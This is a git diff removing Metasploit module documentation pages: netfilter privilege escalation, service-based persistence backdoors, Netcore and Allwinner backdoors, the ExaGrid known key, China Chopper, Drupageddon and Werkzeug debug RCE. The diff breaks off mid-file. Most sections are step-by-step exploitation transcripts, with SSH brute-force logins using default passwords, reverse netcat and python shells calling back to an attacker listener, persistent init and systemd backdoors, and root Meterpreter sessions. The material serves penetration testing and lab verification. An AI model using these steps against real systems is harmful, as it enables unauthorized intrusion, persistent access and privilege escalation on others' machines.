-    [*] Executing /tmp/fI1xW1Js, may take around 35s to finish.  Watching for /tmp/GWqpwKnG to be created.
-    [*] Waited 0s so far
-    [*] Waited 10s so far
-    [*] Waited 20s so far
-    [*] Waited 30s so far
-    [+] desc finished, env ready.
-    [*] Writing payload to /tmp/Thzyfenv
-    [*] Max line length is 65537
-    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
-    [*] Writing pwn executable to /tmp/wmfFiQKu.c
-    [*] Max line length is 65537
-    [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
-    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-    [*] Sending stage (1495599 bytes) to 192.168.2.137
-    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400
-    [+] Deleted /tmp/fI1xW1Js.c
-    [+] Deleted /tmp/GWqpwKnG
-    [+] Deleted /tmp/fI1xW1Js
-    [+] Deleted /tmp/Thzyfenv
-    [+] Deleted /tmp/wmfFiQKu.c
-    [+] Deleted /tmp/wmfFiQKu
-    
-    meterpreter > sysinfo
-    Computer     : ubuntu
-    OS           : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
-    Architecture : x86_64
-    Meterpreter  : x86/linux
-    meterpreter > getuid
-    Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
-
-#### Escalate w/ pre-compiled binaries
-
-    msf exploit(netfilter_priv_esc) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
-    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
-    [-] libc6-dev-i386 is not installed.  Compiling will fail.
-    [-] gcc-multilib is not installed.  Compiling will fail.
-    [-] gcc is not installed.  Compiling will fail.
-    [*] Dropping pre-compiled exploit on system
-    [*] Checking if ip_tables is loaded in kernel
-    [+] ip_tables.ko is loaded
-    [*] Checking if shem or sham are installed
-    [+] shem and sham not present.
-    [*] Max line length is 65537
-    [*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf
-    [*] Executing /tmp/8lQZGJdL, may take around 35s to finish.  Watching for /tmp/okDjTFSS to be created.
-    [*] Waited 0s so far
-    [*] Waited 10s so far
-    [*] Waited 20s so far
-    [*] Waited 30s so far
-    [+] desc finished, env ready.
-    [*] Writing payload to /tmp/2016_4997_payload
-    [*] Max line length is 65537
-    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
-    [*] Writing pwn executable to /tmp/nOO6sYqi
-    [*] Max line length is 65537
-    [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
-    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-    [*] Sending stage (1495599 bytes) to 192.168.2.137
-    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400
-    [+] Deleted /tmp/okDjTFSS
-    [+] Deleted /tmp/2016_4997_payload
-    [+] Deleted /tmp/nOO6sYqi
-    
-    meterpreter > sysinfo
-    Computer     : ubuntu
-    OS           : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
-    Architecture : x86_64
-    Meterpreter  : x86/linux
-    meterpreter > getuid
-    Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
-
-#### Re-exploit
-
-In this scenario, we already exploit the box, for whatever reason our shell died.  So now we want to re-exploit, but we dont need to run desc again.
-
-    msf exploit(netfilter_priv_esc) > set reexploit true
-    reexploit => true
-    msf exploit(netfilter_priv_esc) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
-    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
-    [+] libc6-dev-i386 is installed
-    [+] gcc-multilib is installed
-    [+] gcc is installed
-    [*] Live compiling exploit on system
-    [*] Checking if ip_tables is loaded in kernel
-    [+] ip_tables.ko is loaded
-    [*] Checking if shem or sham are installed
-    [+] shem and sham not present.
-    [*] Writing payload to /tmp/egMfQrrI
-    [*] Max line length is 65537
-    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
-    [*] Writing pwn executable to /tmp/Yf8CAdMu.c
-    [*] Max line length is 65537
-    [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
-    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-    [*] Sending stage (1495599 bytes) to 192.168.2.137
-    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400
-    [+] Deleted /tmp/egMfQrrI
-    [+] Deleted /tmp/Yf8CAdMu.c
-    [+] Deleted /tmp/Yf8CAdMu
-    
-    meterpreter > 
-
-#### Re-exploit w/ pre-compiled binaries
-
-    msf exploit(netfilter_priv_esc) > set reexploit true
-    reexploit => true
-    msf exploit(netfilter_priv_esc) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.2.117:4444 
-    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
-    [+] libc6-dev-i386 is installed
-    [-] gcc-multilib is not installed.  Compiling will fail.
-    [-] gcc is not installed.  Compiling will fail.
-    [*] Dropping pre-compiled exploit on system
-    [*] Checking if ip_tables is loaded in kernel
-    [+] ip_tables.ko is loaded
-    [*] Checking if shem or sham are installed
-    [+] shem and sham not present.
-    [*] Writing payload to /tmp/2016_4997_payload
-    [*] Max line length is 65537
-    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
-    [*] Writing pwn executable to /tmp/SZrv2NOR
-    [*] Max line length is 65537
-    [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
-    [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
-    [*] Sending stage (1495599 bytes) to 192.168.2.137
-    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400
-    
-    meterpreter > 
@@ -1,254 +0,0 @@
-### Creating A Testing Environment
-
-  This module has been tested against:
-
-1. Kali 2.0 (System V)
-2. Ubuntu 14.04 (Upstart)
-3. Ubuntu 16.04 (systemd)
-4. Centos 5 (System V)
-5. Fedora 18 (systemd)
-6. Fedora 20 (systemd)
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  3. Do: `use exploit/linux/local/service_persistence`
-  4. Do: `set session #`
-  5. Do: `set verbose true`
-  6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
-  7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system.
-  8. Do: `set lhost`
-  9. Do: `exploit`
-  10. Do: `use exploit/multi/handler`
-  11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
-  12. Do: `set lhost`
-  13. Do: `exploit -j`
-  14. Kill your shell (if System V, reboot target).  Upstart/systemd wait 10sec
-  15. Get Shell
-
-## Options
-
-**target**
-
-  There are several targets selectable, which all have their own issues.
-
-0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
-1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot).  This logs to syslog or /var/log/<process>.log and .err
-2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
-3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
-
-**SHELLPATH**
-  
-  If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here.  Default is /usr/local/bin
-
-**SERVICE**
-
-  The name of the service to create.  If not chosen, a 7 character random one is created.
-
-**SHELL_NAME**
-
-  The name of the file to write with our shell.  If not chosen, a 5 character random one is created.
-
-## Scenarios
-
-### System V (Centos 5 - root - chkconfig)
-
-Get initial access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set rhosts 192.168.199.131
-    rhosts => 192.168.199.131
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password centos
-    password => centos
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] 192.168.199.131:22 SSH - Starting bruteforce
-    [+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux '
-    [*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Install our callback service (system_v w/ chkconfig).  Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
-    msf exploit(service_persistence) > set session 1
-    session => 1
-    msf exploit(service_persistence) > set verbose true
-    verbose => true
-    msf exploit(service_persistence) > set SHELLPATH /bin
-    SHELLPATH => /bin
-    msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
-    payload => cmd/unix/reverse_netcat
-    msf exploit(service_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(service_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Writing backdoor to /bin/GUIJc
-    [*] Max line length is 65537
-    [*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf
-    [*] Utilizing System_V
-    [*] Utilizing chkconfig
-    [*] Writing service: /etc/init.d/HqdezBF
-    [*] Max line length is 65537
-    [*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf
-    [*] Enabling & starting our service
-    [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400
-
-Reboot the box to prove persistence
-
-    reboot
-    ^Z
-    Background session 2? [y/N]  y
-    msf exploit(service_persistence) > use exploit/multi/handler
-    msf exploit(handler) > set payload cmd/unix/reverse_netcat
-    payload => cmd/unix/reverse_netcat
-    msf exploit(handler) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(handler) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400
-
-
-### Upstart (Ubuntu 14.04.4 Server - root)
-Of note, I allowed Root login via SSH w/ password only to gain easy initial access
-
-Get initial access
-
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] 10.10.60.175:22 SSH - Starting bruteforce
-    [+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux '
-    [*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Install our callback service (Upstart)
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
-    msf exploit(service_persistence) > set session 1
-    session => 1
-    msf exploit(service_persistence) > set verbose true
-    verbose => true
-    msf exploit(service_persistence) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(service_persistence) > set lhost 10.10.60.168
-    lhost => 10.10.60.168
-    msf exploit(service_persistence) > exploit
-    
-    [*] Started reverse handler on 10.10.60.168:4444 
-    [*] Writing backdoor to /usr/local/bin/bmmjv
-    [*] Max line length is 65537
-    [*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf
-    [*] Utilizing Upstart
-    [*] Writing /etc/init/Hipnufl.conf
-    [*] Max line length is 65537
-    [*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf
-    [*] Starting service
-    [*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log
-    [*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400
-
-And now, we can kill the callback shell from our previous session
-
-    ^Z
-    Background session 5? [y/N]  y
-    msf exploit(service_persistence) > sessions -i 1
-    [*] Starting interaction with 1...
-    
-    netstat -antp | grep 4444
-    tcp        0      0 10.10.60.175:44368      10.10.60.168:4444       ESTABLISHED 1783/bash
-    tcp        0      0 10.10.60.175:44370      10.10.60.168:4444       ESTABLISHED 1789/python
-    kill 1783
-    [*] 10.10.60.175 - Command shell session 5 closed.  Reason: Died from EOFError
-    kill 1789
-
-Now with a multi handler, we can catch Upstart restarting the process every 10sec
-
-    msf > use exploit/multi/handler 
-    msf exploit(handler) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(handler) > set lhost 10.10.60.168
-    lhost => 10.10.60.168
-    msf exploit(handler) > exploit
-    
-    [*] Started reverse handler on 10.10.60.168:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400
-
-
-### systemd (Ubuntu 16.04 Server - root)
-Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works.
-While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode.
-
-Get initial access
-
-    msf exploit(handler) > use exploit/linux/local/service_persistence
-    msf exploit(service_persistence) > set session 1
-    session => 1
-    msf exploit(service_persistence) > set verbose true
-    verbose => true
-    msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
-    payload => cmd/unix/reverse_netcat
-    msf exploit(service_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(service_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Writing backdoor to /usr/local/bin/JSRCF
-    [*] Max line length is 65537
-    [*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf
-    [*] Utilizing systemd
-    [*] /lib/systemd/system/YelHpCx.service
-    [*] Max line length is 65537
-    [*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf
-    [*] Enabling service
-    [*] Starting service
-    [*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400
-    
-    ^Z
-    Background session 7? [y/N]  y
-
-Kill the process on the Ubuntu target box via local access #good_admin
-
-    root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444
-    tcp        0      0 192.168.199.130:47052   192.168.199.128:4444    ESTABLISHED 5632/nc
-    root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632
-
-And logically, we lose our shell
-
-     [*] 192.168.199.130 - Command shell session 7 closed.  Reason: Died from EOFError
-
-Now with a multi handler, we can catch systemd restarting the process every 10sec
-
-
-    msf exploit(service_persistence) > use exploit/multi/handler 
-    msf exploit(handler) > show options
-
-    Module options (exploit/multi/handler):
-
-     Name  Current Setting  Required  Description
-     ----  ---------------  --------  -----------
-    
-    Payload options (cmd/unix/reverse_netcat):
-
-     Name   Current Setting  Required  Description
-     ----   ---------------  --------  -----------
-     LHOST  192.168.199.128  yes       The listen address
-     LPORT  4444             yes       The listen port
-
-    Exploit target:
-
-     Id  Name
-     --  ----
-     0   Wildcard Target
-
-    msf exploit(handler) > exploit
-
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
@@ -1,94 +0,0 @@
-### Vulnerable Devices
-Trend Micro lists "almost all" models as being vulnerable in August 2014.
-
-Vulnerable AND Exploitable:
-
-1. Netcore NI360 second-generation
- 
-Vulnerable, but not Exploitable via this module (details later):
-
-1. Netis WF2414 firmware V1.4.27001
-
-### Lab Emulation
-1. Install qemu
-2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
-3. Starts the mipsel lab
- 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
-4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
- 1. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`
- 2. `tar xvf vuln_squashfs-root.tar.gz`
-5. Run vuln programs.
- 1. `cd nw614 && chroot . /bin/igdmptd`
-
-## Verification Steps
-
-  1. Install the emulator/hardware
-  2. Start msfconsole
-  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
-  4. Do: `set RHOST <ip>`
-  5. Do: `check`
-  6. Do: `exploit`
-  7. You should get a shell.
-
-## Exploitability
-
-As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
-During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
-In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
-
-## Scenarios
-
-The following is an example of a vulnerable AND EXPLOITABLE router.
-
-```
-use exploits/linux/misc/netcore_udp_53413_backdoor
-msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
-RHOST => 192.168.1.1
-msf exploit(netcore_udp_53413_backdoor) > check
-[+] The target is vulnerable.
-msf exploit(netcore_udp_53413_backdoor) > run
-
-[*] Started reverse TCP handler on 192.168.1.2:4444
-[*] Exploiting...
-[*] Command Stager progress -  12.54% done (196/1563 bytes)
-[*] Command Stager progress -  25.08% done (392/1563 bytes)
-[*] Command Stager progress -  37.62% done (588/1563 bytes)
-[*] Command Stager progress -  50.16% done (784/1563 bytes)
-[*] Command Stager progress -  62.70% done (980/1563 bytes)
-[*] Command Stager progress -  75.24% done (1176/1563 bytes)
-[*] Command Stager progress -  87.78% done (1372/1563 bytes)
-[*] Command Stager progress - 100.00% done (1563/1563 bytes)
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
-
-pwd
-/
-ls
-bin
-cfg
-dev
-etc
-lib
-linuxrc
-log
-proc
-sbin
-sh
-sys
-tmp
-usr
-var
-web
-```
-
-The following is an example of a vulnerable but NOT expoitable router.
-
-```
-msf > use exploits/linux/misc/netcore_udp_53413_backdoor
-msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
-rhost => 192.168.1.1
-msf exploit(netcore_udp_53413_backdoor) > check
-
-[+] Backdoor Unlocked
-[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
-[*] The target service is running, but could not be validated.
-```
@@ -1,27 +0,0 @@
-## Vulnerable Application
-
-  ExaGrid devices having a firmware before version 4.8 P26 contain a known ssh private key, and root password
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Do: `use exploit/linux/ssh/exagrid_known_privkey`
-  3. Do: `set rhost <ip>`
-  4. Do: `exploit`
-  5. You should get a shell.
-
-## Scenarios
-
-This is a run against a known vulnerable ExaGrid device.
-```
-msf > use exploit/linux/ssh/exagrid_known_privkey
-msf exploit(exagrid_known_privkey) > set rhost 1.2.3.4
-rhost => 1.2.3.4
-msf exploit(exagrid_known_privkey) > run
-
-[+] Successful login
-[*] Command shell session 3 opened (140.172.223.184:39269 -> 1.2.3.4:22) at 2016-07-23 10:03:19 -0400
-
-ExaGrid diagnostic tools are available in this shell.
-02:05:49 up 12 days, 9:12, 0 users, load average: 3.32, 2.88, 9.21
-```
@@ -1,44 +0,0 @@
-China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
-
-## Vulnerable Application
-
-Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
-  4. Do: `set rport port`
-  5. Do: `set rhost ip`
-  6. Do: `check`
-```
-[+] 192.168.1.103:80 - The target is vulnerable.
-```
-  8. Do: `exploit`
-  9. You should get a shell.
-
-## Options
-
-  **TARGETURI**
-
-  TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
-  
-  **PASSWORD**
-  
-  PASSWORD by default is `chopper`, which is the password of the backdoor.
-
-## Demonstration
-
-```
-msf exploit(caidao_php_backdoor_exec) > exploit
-
-[*] Started reverse handler on 192.168.1.108:4444 
-[*] Sending stage (33068 bytes) to 192.168.1.103
-[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
-
-meterpreter > sysinfo 
-Computer    : kali
-OS          : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
-Meterpreter : php/php
-```
@@ -1,57 +0,0 @@
-## Vulnerable Application
-
-  Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz)
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/multi/http/drupal_drupageddon`
-  4. Do: `set rhost <ip>`
-  5. Do: `run`
-  6. You should get a shell.
-
-## Scenarios
-
-  This is a run against a Drupal 7.31 linux box.
-
-  ```
-msf > use exploit/multi/http/drupal_drupageddon
-msf exploit(drupal_drupageddon)
-msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
-rhost => 1.1.1.1
-msf exploit(drupal_drupageddon) > set verbose true
-verbose => true
-msf exploit(drupal_drupageddon) > exploit
-
-[*] Started reverse TCP handler on 2.2.2.2:4444
-[*] Testing page
-[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
-[*] form_token:
-[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
-[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
-[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
-[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
-[*] Trying to parse enabled modules
-[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
-[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
-[*] Enabling the PHP filter module
-[*] Setting permissions for PHP filter module
-[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
-[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
-[*] admin role id: 3
-[*] Getting tokens from create new article page
-[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
-[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
-[*] Calling preview page. Exploit should trigger...
-[*] Sending stage (33721 bytes) to 1.1.1.1
-[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
-
-meterpreter > sysinfo
-Computer : drupal
-OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
-Meterpreter : php/linux
-
-meterpreter > getuid
-Server username: apache (48)
-  ```
@@ -1,72 +0,0 @@
-## Vulnerable Application
-
-Verified against:
-  + 0.9.6 on Debian
-  + 0.9.6 on Centos
-  + 0.10 on Debian
-  
-A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/multi/http/werkzeug_debug_rce`
-  4. Do: `set rport <port>`
-  5. Do: `set rhost <ip>`
-  6. Do: `check`
-```
-[+] 10.108.106.201:8081 - The target is vulnerable.
-```
-  7. Do: `set payload python/meterpreter/reverse_tcp`
-  8. Do: `set lhost <ip>`
-  9. Do: `exploit`
-  10. You should get a shell.
-
-## Options
-
-  **TARGETURI**
-
-  TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
-
-## Scenarios
-
-Example utilizing the previously mentioned sample app listed above.
-
-```
-msf > use exploit/multi/http/werkzeug_debug_rce
-msf exploit(werkzeug_debug_rce) > set rport 8081
-rport => 8081
-msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
-rhost => 10.108.106.201
-msf exploit(werkzeug_debug_rce) > check
-[+] 10.108.106.201:8081 - The target is vulnerable.
-msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
-payload => python/meterpreter/reverse_tcp
-msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
-lhost => 10.108.106.121
-msf exploit(werkzeug_debug_rce) > exploit
-
-[*] Started reverse handler on 10.108.106.121:4444
-[*] Sending stage (25277 bytes) to 10.108.106.201
-[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
-
-meterpreter > getpid
-Current pid: 13034
-meterpreter > getuid
-Server username: root
-meterpreter > sysinfo
-Computer     : werkzeug
-OS           : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
-Architecture : x86_64
-Meterpreter  : python/python
-meterpreter > shell
-Process 13037 created.
-Channel 0 created.
-/bin/sh: 0: can't access tty; job control turned off
-# ls
-app.py  app.pyc  werkzeug
-# exit
-meterpreter > exit
-[*] Shutting down Meterpreter...
-```
@@ -1,71 +0,0 @@
-  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
-  Vulnerable OS: all OS images available for Orange Pis,
-				 any for FriendlyARM's NanoPi M1,
-				 SinoVoip's M2+ and M3,
-				 Cuebietech's Cubietruck +
-				 Linksprite's pcDuino8 Uno
-  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
-
-This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
-
-## Usage
-
-To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
-
- `use auxiliary/scanner/ssh/ssh_login`
-
-```
-msf auxiliary(ssh_login) > set username orangepi
-username => orangepi
-msf auxiliary(ssh_login) > set password orangepi
-password => orangepi
-msf auxiliary(ssh_login) > set rhosts 192.168.2.21
-rhosts => 192.168.2.21
-msf auxiliary(ssh_login) > exploit
-
-[*] 192.168.2.21:22 SSH - Starting bruteforce
-[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
-
- `use exploit/multi/local/allwinner_backdoor`
-
-```
-msf exploit(allwinner_backdoor) > set verbose true
-verbose => true
-msf exploit(allwinner_backdoor) > set session 1
-session => 1
-msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
-payload => linux/armle/mettle/reverse_tcp
-msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
-lhost => 192.168.2.117
-msf exploit(allwinner_backdoor) > check
-[*]  The target appears to be vulnerable.
-msf exploit(allwinner_backdoor) > exploit
-```
-
-## Successful exploitation:
-
-```
-[*] Started reverse TCP handler on 192.168.2.117:4444 
-[*] Transmitting intermediate stager...(136 bytes)
-[*] Sending stage (374540 bytes) to 192.168.2.248
-[+] Backdoor Found, writing payload to /tmp/odzVx.elf
-[*] Max line length is 65537
-[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
-[+] Escalating
-[*] Transmitting intermediate stager...(136 bytes)
-[*] Sending stage (374540 bytes) to 192.168.2.248
-[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400
-
-meterpreter > getuid
-Server username: uid=0, gid=0, euid=0, egid=0
-meterpreter > sysinfo
-Computer     : 192.168.2.248
-OS           : Ubuntu 14.04 (Linux 3.4.39)
-Architecture : armv7l
-Meterpreter  : armle/linux
-```
@@ -1,203 +0,0 @@
-## Vulnerable Application
-
-  NetBSD 7.0.1 is available from the [official](http://cdn.netbsd.org/pub/NetBSD/NetBSD-7.0.1/images/NetBSD-7.0.1-amd64.iso) site, or on an [unofficial git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/NetBSD-7.0.1-amd64.iso) 
-
-## Issues
-Getting an initial shell that can write files correctly was difficult.  The best I found was reverse_openssl.
-
-Payloads that didn't work:
-* cmd/unix/reverse - connected back, but couldn't write file.
-```
-[*] Started reverse TCP double handler on 172.16.152.1:4444 
